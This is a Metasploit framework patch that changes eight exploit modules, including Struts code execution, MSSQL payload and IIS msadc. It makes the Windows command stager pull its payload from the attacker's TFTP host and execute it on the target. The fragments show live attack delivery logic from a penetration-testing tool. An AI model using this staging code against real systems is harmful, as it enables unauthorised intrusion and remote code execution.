From bbbec267b6a543f37f26ed9450876e7eb33588fc Mon Sep 17 00:00:00 2001 From: bcoles Date: Wed, 29 Jun 2022 19:10:52 +1000 Subject: [PATCH] exploits: Set tftphost option for modules which use Windows TFTP stager --- modules/exploits/multi/http/struts_code_exec.rb | 3 ++- .../multi/http/struts_code_exec_exception_delegator.rb | 3 ++- modules/exploits/windows/antivirus/ams_xfr.rb | 7 ++----- .../windows/http/ca_totaldefense_regeneratereports.rb | 3 ++- modules/exploits/windows/http/osb_uname_jlist.rb | 4 ++-- modules/exploits/windows/iis/msadc.rb | 3 ++- modules/exploits/windows/misc/altiris_ds_sqli.rb | 3 ++- modules/exploits/windows/mssql/mssql_payload.rb | 4 ++-- 8 files changed, 16 insertions(+), 14 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index 1caa28f051..42605e379b 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -91,7 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote def windows_stager print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") - execute_cmdstager({ :temp => '.' }) + tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] + execute_cmdstager({ temp: '.', tftphost: tftphost }) @payload_exe = generate_payload_exe print_status("Attempting to execute the payload...") diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index fe1185bcab..6f079a988f 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -106,7 +106,8 @@ class MetasploitModule < Msf::Exploit::Remote exe_fname = rand_text_alphanumeric(4 + rand(4)) + ".exe" print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") - execute_cmdstager({ :temp => '.' }) + tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] + execute_cmdstager({ temp: '.', tftphost: tftphost }) @payload_exe = generate_payload_exe print_status("Attempting to execute the payload...") diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb index eb70eeaf43..d725040973 100644 --- a/modules/exploits/windows/antivirus/ams_xfr.rb +++ b/modules/exploits/windows/antivirus/ams_xfr.rb @@ -50,16 +50,13 @@ class MetasploitModule < Msf::Exploit::Remote end def windows_stager - - exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" - print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") - execute_cmdstager({ :temp => '.', :cgifname => exe_fname }) + tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] + execute_cmdstager({ temp: '.', tftphost: tftphost }) @payload_exe = generate_payload_exe print_status("Attempting to execute the payload...") execute_command(@payload_exe) - end def execute_command(cmd, opts = {}) diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb index 59f70e4efb..39018f8ed8 100644 --- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb +++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb @@ -53,7 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote def windows_stager print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") - execute_cmdstager({ :temp => '.' }) + tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] + execute_cmdstager({ temp: '.', tftphost: tftphost }) @payload_exe = generate_payload_exe print_status("Attempting to execute the payload...") diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 755a462a59..d6d88994e9 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -54,12 +54,12 @@ class MetasploitModule < Msf::Exploit::Remote def windows_stager print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") - execute_cmdstager({ :temp => '.' }) + tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] + execute_cmdstager({ temp: '.', tftphost: tftphost }) @payload_exe = generate_payload_exe print_status("Attempting to execute the payload...") execute_command(@payload_exe) - end def execute_command(cmd, opts = {}) diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 78fa2ca2d4..df77aaa776 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -344,7 +344,8 @@ class MetasploitModule < Msf::Exploit::Remote res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z) # Use the CMD stager to get a payload running - execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname }) + tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] + execute_cmdstager({ temp: '.', tftphost: tftphost, linemax: 1_400, cgifname: exe_fname, noconcat: true }) # Save these file names for later deletion @exe_cmd_copy = exe_fname diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 15813d5f86..dd92c9bfb1 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb +++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -173,7 +173,8 @@ Processor-Speed=#{processor_speed} # CmdStagerVBS was tested here as well, however delivery took roughly # 30 minutes and required sending almost 350 notification messages. # size constraint requirement for SQLi is: linemax => 393 - execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\', :flavor => :tftp }) + tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] + execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp }) end def on_new_session(client) diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index 628d44656f..cc3226876d 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -99,8 +99,8 @@ class MetasploitModule < Msf::Exploit::Remote method = datastore['METHOD'].downcase if (method =~ /^cmd/) - execute_cmdstager({ :linemax => 1500, :nodelete => true }) - #execute_cmdstager({ :linemax => 1500 }) + tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] + execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true }) else # Generate the EXE, this is the same no matter what delivery mechanism we use exe = generate_payload_exe